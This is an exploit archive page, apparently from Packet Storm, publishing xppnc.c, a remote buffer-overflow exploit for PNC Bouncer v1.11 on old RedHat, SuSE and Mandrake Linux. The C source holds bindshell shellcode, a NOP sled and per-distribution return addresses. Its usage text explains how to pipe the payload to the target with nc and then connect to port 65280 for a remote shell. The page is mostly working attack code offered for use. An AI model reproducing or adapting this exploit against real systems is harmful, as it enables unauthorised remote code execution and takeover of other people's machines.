exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

xppnc.c

xppnc.c
Posted Jul 21, 2000
Authored by RaiSe | Site undersec.com

PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.

tags | exploit, remote
systems | linux, redhat, suse, mandrake
SHA-256 | f3e7d956629059a23a4eafb60363507ed837755b27f531596180153d41af5c6f

xppnc.c

Change Mirror Download
/* PNC Bouncer Xploit por RaiSe                 */
/* Testeado en version 1.11 */
/* */
/* Offset en RedHat 6.0 0xbffffb24 */
/* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
/* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
/* bindshell by ADM */
/* */
/* UNDERSEC Security Team */
/* http://www.undersec.com */

#include <stdio.h>

int i;
char *ptr;
unsigned long *ptr2,dire;
char bindshell[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
"\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
"\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
"\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
"\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
"\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

char buffer[1091];

int main(int argc, char *argv[])
{
if (argc<3) {
printf("\nPNC Bouncer Xploit por RaiSe");
printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
printf(" nc host 65280\n\n");
printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
exit(0);
}

if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }

for(i=0;i<1091;i++)
buffer[i]=0x00;
ptr=buffer;

for(i=0;i<1011-strlen(bindshell);i++)
*(ptr++)=0x90;
for(i=0;i<strlen(bindshell);i++)
*(ptr++)=bindshell[i];
ptr2=(long *)ptr;
for(i=0;i<20;i++)
*(ptr2++)=dire+atoi(argv[1]);

sleep(4);
printf("USER %s\n",buffer);
}
/* www.hack.co.za [19 July]*/
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close